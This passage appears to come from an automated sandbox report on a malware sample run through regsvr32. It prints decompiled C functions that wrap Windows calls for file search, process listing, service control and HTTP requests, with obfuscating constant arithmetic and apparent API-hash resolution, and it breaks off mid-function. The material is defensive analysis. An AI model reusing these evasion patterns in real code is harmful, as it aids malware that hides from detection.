                                                                                                                • Source File: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.482251829.0000000000260000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.482269667.0000000000284000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_260000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 2962429428-0
                                                                                                                • Opcode ID: e059c3c066ff345504bba9c85b1d4992eba54445fe3d98b1d9d536134e0d9d68
                                                                                                                • Instruction ID: 1ec6cad0b6609c8a3c01229681f4c9080789df0e306844a62aef31b5bc29db21
                                                                                                                • Opcode Fuzzy Hash: e059c3c066ff345504bba9c85b1d4992eba54445fe3d98b1d9d536134e0d9d68
                                                                                                                • Instruction Fuzzy Hash: 7D114F71E01208FFEB08DFA5D80A9EEBBB5EB84314F50C09AE504A7280E7B15F619F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 72%
                                                                                                                			E002627C2(void* __ecx, struct _WIN32_FIND_DATAW* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t31;
                                                                                                                				void* _t38;
                                                                                                                				struct _WIN32_FIND_DATAW* _t42;
                                                                                                                
                                                                                                                				_push(_a12);
                                                                                                                				_t42 = __edx;
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E0024C98A(_t31);
                                                                                                                				_v12 = 0xe4f1ae;
                                                                                                                				_v12 = _v12 << 8;
                                                                                                                				_v12 = _v12 >> 0xf;
                                                                                                                				_v12 = _v12 * 0x74;
                                                                                                                				_v12 = _v12 ^ 0x00cdd546;
                                                                                                                				_v8 = 0xc4dfbf;
                                                                                                                				_v8 = _v8 + 0xffff3a7f;
                                                                                                                				_v8 = _v8 | 0xfa0822f8;
                                                                                                                				_v8 = _v8 << 8;
                                                                                                                				_v8 = _v8 ^ 0xcc3bab77;
                                                                                                                				_v16 = 0x78a824;
                                                                                                                				_v16 = _v16 + 0xffffcfc2;
                                                                                                                				_v16 = _v16 ^ 0x007030e4;
                                                                                                                				E00247F78(__ecx, 0xbd3f148a, __ecx, 0x1e, __ecx, 0xa61827ac);
                                                                                                                				_t38 = FindFirstFileW(_a4, _t42); // executed
                                                                                                                				return _t38;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(00CDD546,?,?,?,?,?,?,?,?,?,00000019), ref: 00262853
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileFindFirst
                                                                                                                • String ID: 0p
                                                                                                                • API String ID: 1974802433-1802687315
                                                                                                                • Opcode ID: fc2b56e9a5af49955b23cac201fd6edf975b456a943d445e867540712669b5ae
                                                                                                                • Instruction ID: 73cc87abafc66d262bdce3cb05264045830dd454cc55176bdcec6c2192430fc1
                                                                                                                • Opcode Fuzzy Hash: fc2b56e9a5af49955b23cac201fd6edf975b456a943d445e867540712669b5ae
                                                                                                                • Instruction Fuzzy Hash: 9F1115B1C0120CBBDF14EFA5D94988EBFB4EB40314F208198E81566251D3719B64DFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0024BE5E(int __edx) {
                                                                                                                				unsigned int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t36;
                                                                                                                				signed int _t37;
                                                                                                                				int _t42;
                                                                                                                
                                                                                                                				_v12 = 0x4d2169;
                                                                                                                				_v12 = _v12 + 0xffff4d82;
                                                                                                                				_v12 = _v12 << 4;
                                                                                                                				_v12 = _v12 ^ 0x04c328ab;
                                                                                                                				_v16 = 0xf87f59;
                                                                                                                				_t37 = 0x22;
                                                                                                                				_t42 = __edx;
                                                                                                                				_v16 = _v16 / _t37;
                                                                                                                				_v16 = _v16 ^ 0x0002495a;
                                                                                                                				_v8 = 0x5a0fa5;
                                                                                                                				_v8 = _v8 * 0x42;
                                                                                                                				_v8 = _v8 >> 6;
                                                                                                                				_v8 = _v8 >> 0xc;
                                                                                                                				_v8 = _v8 ^ 0x00011980;
                                                                                                                				E00247F78(_t37, 0xbd3f148a, _t37, 0xc4, _t37, 0x9af936f0);
                                                                                                                				_t36 = CreateToolhelp32Snapshot(_t42, 0); // executed
                                                                                                                				return _t36;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00CD5045,00000000,?,?,?,000073AC), ref: 0024BEDD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateSnapshotToolhelp32
                                                                                                                • String ID: i!M
                                                                                                                • API String ID: 3332741929-1018495347
                                                                                                                • Opcode ID: fc23c2cb32c452360c21f51f575530c3eb76c2a302990b8ead27f63d033a9342
                                                                                                                • Instruction ID: cef1306cc511ecf1d6416f1d646e6385b5452e1ae07d113004fd98cf305c8602
                                                                                                                • Opcode Fuzzy Hash: fc23c2cb32c452360c21f51f575530c3eb76c2a302990b8ead27f63d033a9342
                                                                                                                • Instruction Fuzzy Hash: A5010871D0520CFBDB18DFA9D94AA8EBBB4EB90304F20C199E914A7280D7B45B588B85
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph
                                                                                                                control_flow_graph 718 246e01-246eb3 call 24c98a call 247f78 OpenSCManagerW
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E00246E01(void* __ecx, void* __edx, intOrPtr _a8, int _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				short* _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				void* _t36;
                                                                                                                				void* _t46;
                                                                                                                				signed int _t48;
                                                                                                                				signed int _t49;
                                                                                                                
                                                                                                                				_push(0);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(0);
                                                                                                                				E0024C98A(_t36);
                                                                                                                				_v32 = 0x5e4691;
                                                                                                                				_v28 = 0xb22c2d;
                                                                                                                				_v24 = 0xd08f35;
                                                                                                                				_v20 = 0;
                                                                                                                				_v16 = 0x466167;
                                                                                                                				_t48 = 0x37;
                                                                                                                				_v16 = _v16 / _t48;
                                                                                                                				_v16 = _v16 ^ 0x000b48c4;
                                                                                                                				_v8 = 0x78b9b;
                                                                                                                				_t49 = 0x12;
                                                                                                                				_v8 = _v8 / _t49;
                                                                                                                				_v8 = _v8 + 0x94cf;
                                                                                                                				_v8 = _v8 ^ 0x0006a86d;
                                                                                                                				_v12 = 0x7d284b;
                                                                                                                				_v12 = _v12 + 0xfffff9ba;
                                                                                                                				_v12 = _v12 ^ 0x007a5aaa;
                                                                                                                				E00247F78(_t49, 0x616ae4, _t49, 0x10d, _t49, 0x2c4dea6c);
                                                                                                                				_t46 = OpenSCManagerW(0, 0, _a12); // executed
                                                                                                                				return _t46;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00246EAD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ManagerOpen
                                                                                                                • String ID: K(}$gaF$ja
                                                                                                                • API String ID: 1889721586-538739611
                                                                                                                • Opcode ID: 6ef6a4cb5bbfdb27ad125f8102e1ce17c50244576f0bfce07033f3d63a434212
                                                                                                                • Instruction ID: 161634b4ddbe713b960a7f07fea86dadfddbed23c5276b415456f4b05c0be62c
                                                                                                                • Opcode Fuzzy Hash: 6ef6a4cb5bbfdb27ad125f8102e1ce17c50244576f0bfce07033f3d63a434212
                                                                                                                • Instruction Fuzzy Hash: 7E1155B2D01218BBDB04DFA9C8498DEBFB6EF45314F10C189FA18A7241D7B55B259FA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 73%
                                                                                                                			E0024BEE4(void* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16) {
                                                                                                                				signed int _v8;
                                                                                                                				unsigned int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t36;
                                                                                                                				int _t43;
                                                                                                                
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__ecx);
                                                                                                                				E0024C98A(_t36);
                                                                                                                				_v24 = _v24 & 0x00000000;
                                                                                                                				_v20 = _v20 & 0x00000000;
                                                                                                                				_v28 = 0x114bf3;
                                                                                                                				_v8 = 0x232d23;
                                                                                                                				_v8 = _v8 >> 7;
                                                                                                                				_v8 = _v8 + 0xc4ee;
                                                                                                                				_v8 = _v8 * 0x1e;
                                                                                                                				_v8 = _v8 ^ 0x001ad829;
                                                                                                                				_v12 = 0x454227;
                                                                                                                				_v12 = _v12 ^ 0xb663ae8e;
                                                                                                                				_v12 = _v12 >> 3;
                                                                                                                				_v12 = _v12 ^ 0x16c7b083;
                                                                                                                				_v16 = 0x24a5bd;
                                                                                                                				_v16 = _v16 + 0xffffd8d0;
                                                                                                                				_v16 = _v16 ^ 0x00233a4c;
                                                                                                                				E00247F78(__ecx, 0xbd3f148a, __ecx, 0x25d, __ecx, 0x980b4427);
                                                                                                                				_t43 = lstrcmpiW(_a4, _a12); // executed
                                                                                                                				return _t43;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • lstrcmpiW.KERNEL32(16C7B083,00000000), ref: 0024BF85
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: lstrcmpi
                                                                                                                • String ID: #-#$'BE$L:#
                                                                                                                • API String ID: 1586166983-27105818
                                                                                                                • Opcode ID: a0d71376c937979259f46d11f29c099a748033728b8adeb22975462810a77b95
                                                                                                                • Instruction ID: 538198d59d58e9fb5caad4e50eaae65b4c9fcca7f9a90ad4fcb747825640aa5c
                                                                                                                • Opcode Fuzzy Hash: a0d71376c937979259f46d11f29c099a748033728b8adeb22975462810a77b95
                                                                                                                • Instruction Fuzzy Hash: 141118B2C1520CFBCF04DFA4DA06AADBBB1FF54305F208188F914A6251D3B24B249F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 59%
                                                                                                                			E00253D5B(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a16, intOrPtr _a24, intOrPtr _a32) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t35;
                                                                                                                				void* _t43;
                                                                                                                				signed int _t45;
                                                                                                                				long _t51;
                                                                                                                
                                                                                                                				_push(_a32);
                                                                                                                				_t51 = __edx;
                                                                                                                				_push(0);
                                                                                                                				_push(_a24);
                                                                                                                				_push(0);
                                                                                                                				_push(_a16);
                                                                                                                				_push(0);
                                                                                                                				_push(0);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				E0024C98A(_t35);
                                                                                                                				_v12 = 0x9c1ed;
                                                                                                                				_v12 = _v12 ^ 0x365fe830;
                                                                                                                				_v12 = _v12 + 0x9fbc;
                                                                                                                				_t45 = 0x5d;
                                                                                                                				_v12 = _v12 / _t45;
                                                                                                                				_v12 = _v12 ^ 0x009220cb;
                                                                                                                				_v8 = 0x667c0f;
                                                                                                                				_v8 = _v8 + 0xd261;
                                                                                                                				_v8 = _v8 ^ 0x09cf929c;
                                                                                                                				_v8 = _v8 + 0xffffda63;
                                                                                                                				_v8 = _v8 ^ 0x09a515da;
                                                                                                                				_v16 = 0x28dd03;
                                                                                                                				_v16 = _v16 | 0x7771a862;
                                                                                                                				_v16 = _v16 ^ 0x77784f4c;
                                                                                                                				E00247F78(_t45, 0x2da3a2fe, _t45, 0x253, _t45, 0x943bbfe4);
                                                                                                                				_t43 = InternetOpenW(0, _t51, 0, 0, 0); // executed
                                                                                                                				return _t43;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • InternetOpenW.WININET(00000000,?,00000000,00000000,00000000), ref: 00253E09
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: InternetOpen
                                                                                                                • String ID: 0_6$LOxw
                                                                                                                • API String ID: 2038078732-4015435269
                                                                                                                • Opcode ID: a7eb1b67cc8f1dcac96c1a2b0e42eeb4af4255eb802913b4a86a16440e2e2e03
                                                                                                                • Instruction ID: 1006d8bc8bbb2fb095da13534425a034a7d747dd0380e12ac4720544a90058ff
                                                                                                                • Opcode Fuzzy Hash: a7eb1b67cc8f1dcac96c1a2b0e42eeb4af4255eb802913b4a86a16440e2e2e03
                                                                                                                • Instruction Fuzzy Hash: 9B113471D00208BBDB64DEA6C84AC9FBFB8EF85700F208099F904A6150D3718B15DFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 49%
                                                                                                                			E0024CAFE(WCHAR* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, long _a16, WCHAR* _a24, void* _a32, intOrPtr _a36, intOrPtr _a44, intOrPtr _a48) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				WCHAR* _v20;
                                                                                                                				WCHAR* _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				void* _t36;
                                                                                                                				void* _t42;
                                                                                                                				WCHAR* _t47;
                                                                                                                
                                                                                                                				_push(_a48);
                                                                                                                				_t47 = __ecx;
                                                                                                                				_push(_a44);
                                                                                                                				_push(0);
                                                                                                                				_push(_a36);
                                                                                                                				_push(_a32);
                                                                                                                				_push(0);
                                                                                                                				_push(_a24);
                                                                                                                				_push(0);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(0);
                                                                                                                				_push(__ecx);
                                                                                                                				E0024C98A(_t36);
                                                                                                                				_v32 = 0x13a0d;
                                                                                                                				_v28 = 0xb8a00;
                                                                                                                				_v24 = 0;
                                                                                                                				_v20 = 0;
                                                                                                                				_v16 = 0xfb6d4e;
                                                                                                                				_v16 = _v16 + 0xffff3e7e;
                                                                                                                				_v16 = _v16 ^ 0x00ffee7b;
                                                                                                                				_v12 = 0xa2ec0b;
                                                                                                                				_v12 = _v12 << 6;
                                                                                                                				_v12 = _v12 ^ 0x28b78b49;
                                                                                                                				_v8 = 0x384820;
                                                                                                                				_v8 = _v8 + 0xffffbc0c;
                                                                                                                				_v8 = _v8 | 0x7a96533d;
                                                                                                                				_v8 = _v8 ^ 0x7ab4c2f3;
                                                                                                                				E00247F78(__ecx, 0x2da3a2fe, __ecx, 0x1ca, __ecx, 0x92120e72);
                                                                                                                				_t42 = HttpOpenRequestW(_a32, _t47, _a24, 0, 0, 0, _a16, 0); // executed
                                                                                                                				return _t42;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • HttpOpenRequestW.WININET(?,?,00013A0D,00000000,00000000,00000000,000FFBDC,00000000), ref: 0024CBB7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: HttpOpenRequest
                                                                                                                • String ID: H8
                                                                                                                • API String ID: 1984915467-3618562657
                                                                                                                • Opcode ID: 87a21e86972055f17f44a7ab68bbd3dcdf7c118beff39969dd89e917131fbbc7
                                                                                                                • Instruction ID: 1f4151042c94b87dd68e07397f3fd3ce57f7344f28e1047208f5a62c299afc55
                                                                                                                • Opcode Fuzzy Hash: 87a21e86972055f17f44a7ab68bbd3dcdf7c118beff39969dd89e917131fbbc7
                                                                                                                • Instruction Fuzzy Hash: 1E21F472801249BBCF159F96CD09CDFBFB9EF85704F508189F91462220D3B69A21EFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 82%
                                                                                                                			E0025ED7B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				unsigned int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t33;
                                                                                                                				int _t43;
                                                                                                                				signed int _t45;
                                                                                                                				signed int _t46;
                                                                                                                				void* _t53;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t53 = __ecx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__ecx);
                                                                                                                				E0024C98A(_t33);
                                                                                                                				_v16 = 0xcf28aa;
                                                                                                                				_v16 = _v16 + 0xffff6a13;
                                                                                                                				_v16 = _v16 ^ 0x00c8c4e4;
                                                                                                                				_v12 = 0x49ff01;
                                                                                                                				_t45 = 0xb;
                                                                                                                				_v12 = _v12 / _t45;
                                                                                                                				_t46 = 0x5d;
                                                                                                                				_v12 = _v12 / _t46;
                                                                                                                				_v12 = _v12 ^ 0x00001054;
                                                                                                                				_v8 = 0x2a1e4a;
                                                                                                                				_v8 = _v8 | 0x32e5c17e;
                                                                                                                				_v8 = _v8 >> 0xb;
                                                                                                                				_v8 = _v8 ^ 0x00072801;
                                                                                                                				E00247F78(_t46, 0x616ae4, _t46, 0x1ec, _t46, 0x378734d);
                                                                                                                				_t43 = CloseServiceHandle(_t53); // executed
                                                                                                                				return _t43;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0025EE0D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleService
                                                                                                                • String ID: ja
                                                                                                                • API String ID: 1725840886-1100367487
                                                                                                                • Opcode ID: 703c2c49735e2f09307ecac5439fd3e367e4715b3db01d8363efba17d125817d
                                                                                                                • Instruction ID: 7c8ef5946046a509ce4fd396256a0775366bebe8b68a2aea92f82e0033de63b6
                                                                                                                • Opcode Fuzzy Hash: 703c2c49735e2f09307ecac5439fd3e367e4715b3db01d8363efba17d125817d
                                                                                                                • Instruction Fuzzy Hash: 7B015B71D01208BFDB08DFA4C94A8DEBFB5EF45314F10C09AE914A7241E7B25B658F50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 78%
                                                                                                                			E0025FC9E(void* __ecx, void* __edx, intOrPtr _a4, struct tagPROCESSENTRY32W _a8, intOrPtr _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t35;
                                                                                                                				int _t43;
                                                                                                                				signed int _t45;
                                                                                                                				void* _t50;
                                                                                                                
                                                                                                                				_push(_a12);
                                                                                                                				_t50 = __edx;
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				E0024C98A(_t35);
                                                                                                                				_v16 = 0x6676ed;
                                                                                                                				_v16 = _v16 + 0x5d25;
                                                                                                                				_v16 = _v16 ^ 0x006eb8f2;
                                                                                                                				_v12 = 0x39dc3c;
                                                                                                                				_t45 = 0x2e;
                                                                                                                				_v12 = _v12 / _t45;
                                                                                                                				_v12 = _v12 + 0xffffb164;
                                                                                                                				_v12 = _v12 ^ 0xe9b1b7d9;
                                                                                                                				_v12 = _v12 ^ 0xe9be5d71;
                                                                                                                				_v8 = 0x2a9e9b;
                                                                                                                				_v8 = _v8 << 0xe;
                                                                                                                				_v8 = _v8 << 2;
                                                                                                                				_v8 = _v8 + 0x2aec;
                                                                                                                				_v8 = _v8 ^ 0x9e97161a;
                                                                                                                				E00247F78(_t45, 0xbd3f148a, _t45, 0x198, _t45, 0x9305a9de);
                                                                                                                				_t43 = Process32NextW(_t50, _a8); // executed
                                                                                                                				return _t43;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • Process32NextW.KERNEL32(000073AC,006EB8F2,?,?,?,?,?,?,?,?,000073AC), ref: 0025FD3B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: NextProcess32
                                                                                                                • String ID: vf
                                                                                                                • API String ID: 1850201408-965054081
                                                                                                                • Opcode ID: 3791c30d4661ad78d5c7f557559a613565b336b39c31cd7733d2065f61184a5b
                                                                                                                • Instruction ID: f05cafa35c58423e8c4c34c24696abe71ab06710c77ef29c32f6bf3a3d7daa66
                                                                                                                • Opcode Fuzzy Hash: 3791c30d4661ad78d5c7f557559a613565b336b39c31cd7733d2065f61184a5b
                                                                                                                • Instruction Fuzzy Hash: 71115776D0130CBBCF54DFA5C90A8DEBBB5EB00314F20C088E92467251D3B18B649F50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 84%
                                                                                                                			E0024EC5D(struct _WIN32_FIND_DATAW* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				void* _t34;
                                                                                                                				int _t41;
                                                                                                                				struct _WIN32_FIND_DATAW* _t45;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t45 = __ecx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__ecx);
                                                                                                                				E0024C98A(_t34);
                                                                                                                				_v24 = _v24 & 0x00000000;
                                                                                                                				_v20 = _v20 & 0x00000000;
                                                                                                                				_v32 = 0x35d0fc;
                                                                                                                				_v28 = 0xd8e3c3;
                                                                                                                				_v16 = 0x4b186c;
                                                                                                                				_v16 = _v16 + 0xffffa127;
                                                                                                                				_v16 = _v16 + 0xffffe137;
                                                                                                                				_v16 = _v16 ^ 0x00439d27;
                                                                                                                				_v12 = 0xede565;
                                                                                                                				_v12 = _v12 << 8;
                                                                                                                				_v12 = _v12 * 0x56;
                                                                                                                				_v12 = _v12 ^ 0xeb0a2ea4;
                                                                                                                				_v8 = 0xa4d72e;
                                                                                                                				_v8 = _v8 ^ 0x3c190439;
                                                                                                                				_v8 = _v8 + 0xc3f7;
                                                                                                                				_v8 = _v8 ^ 0x3cbbf1a6;
                                                                                                                				E00247F78(__ecx, 0xbd3f148a, __ecx, 0x22d, __ecx, 0x80cdcda7);
                                                                                                                				_t41 = FindNextFileW(_a8, _t45); // executed
                                                                                                                				return _t41;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • FindNextFileW.KERNEL32(00439D27,?,?,?,?,?,?,?,?,00000019), ref: 0024ED03
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileFindNext
                                                                                                                • String ID: e
                                                                                                                • API String ID: 2029273394-2857170482
                                                                                                                • Opcode ID: de51f80a73a6695174499350245a793edf301c30511addfc37e5d64773dfada2
                                                                                                                • Instruction ID: eabb176e26cc1f66cbfad4352ce5a3b36fdafc82b277c041c2258f6a61f4cb4f
                                                                                                                • Opcode Fuzzy Hash: de51f80a73a6695174499350245a793edf301c30511addfc37e5d64773dfada2
                                                                                                                • Instruction Fuzzy Hash: CD1103B5C11208BBDB04DFA8D94A9AEBBB4EF40314F60C198E814B6261D3B55B15DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 79%
                                                                                                                			E00244A9D(void* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t32;
                                                                                                                				struct HINSTANCE__* _t39;
                                                                                                                				WCHAR* _t43;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t43 = __edx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E0024C98A(_t32);
                                                                                                                				_v24 = _v24 & 0x00000000;
                                                                                                                				_v20 = _v20 & 0x00000000;
                                                                                                                				_v28 = 0x1178a2;
                                                                                                                				_v16 = 0x17846b;
                                                                                                                				_v16 = _v16 | 0x3185073b;
                                                                                                                				_v16 = _v16 + 0xffff538e;
                                                                                                                				_v16 = _v16 ^ 0x3197b69f;
                                                                                                                				_v12 = 0x16ba99;
                                                                                                                				_v12 = _v12 ^ 0x02625a09;
                                                                                                                				_v12 = _v12 ^ 0x25365766;
                                                                                                                				_v12 = _v12 ^ 0x27431ab3;
